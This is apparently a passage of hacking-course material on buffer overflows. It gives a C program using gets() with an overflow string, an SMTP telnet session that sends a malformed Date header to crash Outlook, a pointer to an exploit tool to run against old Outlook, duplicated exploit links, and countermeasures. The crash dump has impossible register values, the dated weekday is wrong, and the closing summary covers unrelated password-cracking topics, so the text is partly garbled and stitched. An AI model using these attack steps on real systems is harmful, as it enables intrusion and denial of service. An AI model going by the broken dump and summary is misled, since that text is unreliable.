   #include <stdio.h>             int main ( )             {              char name[31 ] ;              printf("Please type your name:  ");              gets(name) ;              printf("Hello, %s", name) ;              return 0; 

Buffer overflow will occur if you enter:

 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    AAAAAAAAAAAAAAAAAA 

In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information.

Buffer overflow attacks are said to have arisen because the C programming language supplied the framework, and poor programming practices supplied the vulnerability.

Once a programmer has found a buffer overflow situation, then it is necessary to create a buffer of hex characters that represent assembled code instructions. The programmer then creates a C program that executes the target program, overflows the buffer by inserting the hex code to be executed.

Outlook Buffer Overflow

• There is a vulnerability in Microsoft Outlook client. The attacker sends an e-mail with a malformed header that causes buffer overflow to occur.

  1. It will cause the victim's machine to crash or

  2. Cause arbitrary code to run on the victim's computer.

• Affects the following versions:

  • Microsoft Outlook versions 97/98 and 2000.

  • Microsoft Outlook Express 4.0, 4.01. 5.0 and 5.01

Because the process was activated as soon as the recipient downloaded the message from the server, this type of buffer overflow attack was very difficult to defend. The only solution at that time was to ask the administrator to delete the mail from the server. However, the mail is not deleted from the server, and next time outlook is loaded, it tried to download the mail, causing it to crash again. Microsoft has since created a patch to eliminate the vulnerability. To see this, use outoutlook.exe from www.ussrback.com and run it against an older version of outlook as patches are likely to be installed on most systems using IE.

The system responds as shown below.

Attacker telnets to an SMTP mail server on port 25 and types the following

 MAIL FROM:   BAD USER@BADUSER.COM   RCPT TO:   VICTIM@.VICTIM.COM   DATA Date: Tuesday, August 2, 2002 +111111111111111111111111111111111111111111111111111111111111111111 . QUIT 

The following error is generated by victim's Outlook.

 Outlook caused an invalid page fault in module at 00de: 003432 Registers: EAX=800045300    CS=018f  EIP=00asdf04  EFLGS=00340045 EAX=800045000    CS=918f  EIP=00asd604  EFLGS=00340f05 EAX=800045000    CS=018f  EIP=00asdf04  EFLGS=00340h05 EAX=800045000    CS=018f  EIP=00asdf04  EFLGS=00340g05 Bytes at CS: EIP Stack dump: 0241f360  01234543  00000001  0000000000  00000003455  00000000340 0000000  34500000  004000000  45000000  3232323223  23232332232  23 

List of Buffer Overflow Cases

• Netmeeting 2.x exploit

  (http://www.cultdeadcow.com/cDc_files/cDc-351/)

• NT RAS Exploit

  (http://www.cerberus-infosec.co.uk/wprasbuf.html)

• IIS Hack

  (http://www.eeye.com)

• Oracle Web Exploit

  (http://www.cerberus-infosec.co.uk/advowl.html)

• Outlook Exploit

  (http://www.ussrback.com/labs50.html)

• IIS.printer

  (http://www.securityfocus.com/bid/2674)

You may find details of a few known buffer overflow exploits at the URLs mentioned below:

• Netmeeting 2.x exploit (http://www.cultdeadcow.com/cDc_files/cDc -351/)

• NT RAS Exploit (http://www.cerberus-infosec.co.uk/wprasbuf.html)

• IIS Hack (http://www.eeye.com)

• Oracle Web Exploit (http://www.cerberus-infosec.co.uk/advowl.html)

• Outlook Exploit (http://www.ussrback.com/labs50.html)

• IIS .printer (http://www.securityfocus.com/bid/2674)

The topic is dealt in detail in a subsequent module which deals with Buffer overflow vulnerability.

Protection against Buffer Overflows

• Buffer overflow vulnerabilities are inherent in code due to poor or no error checking.

• General ways of protecting against buffer overflows:

  1. Close the port of service

  2. apply vendors patch or install the latest version of the software

  3. Filter specific traffic at the firewall

  4. Test key application

  5. Run software at the least privilege required

Therefore countermeasures are directed against these factors. This implies that all buffer overflows must be prevented or all sensitive information must be prevented from being overwritten. However, as this is not feasible, we can either prevent the use of dangerous functions such as gets, strcpy , etc. Or we must prevent data supplied by the attacker from being executed (stops the attacker from jumping into his own buffer). The first principle should be good coding and error checking.

Summary

• Hackers use a variety of means to penetrate systems.

• Password guessing / cracking is one of the first steps.

• Password sniffing is a preferred eavesdropping tactic.

• Vulnerability scanning aids hacker to identify which password cracking technique to use.

• Key stroke logging /other spy ware tools are used as they gain entry to systems to keep up the attacks.

• Invariably evidence of "having been there and done the damage" is eliminated by attackers.

• Stealing files as well as Hiding files are means used to sneak out sensitive information.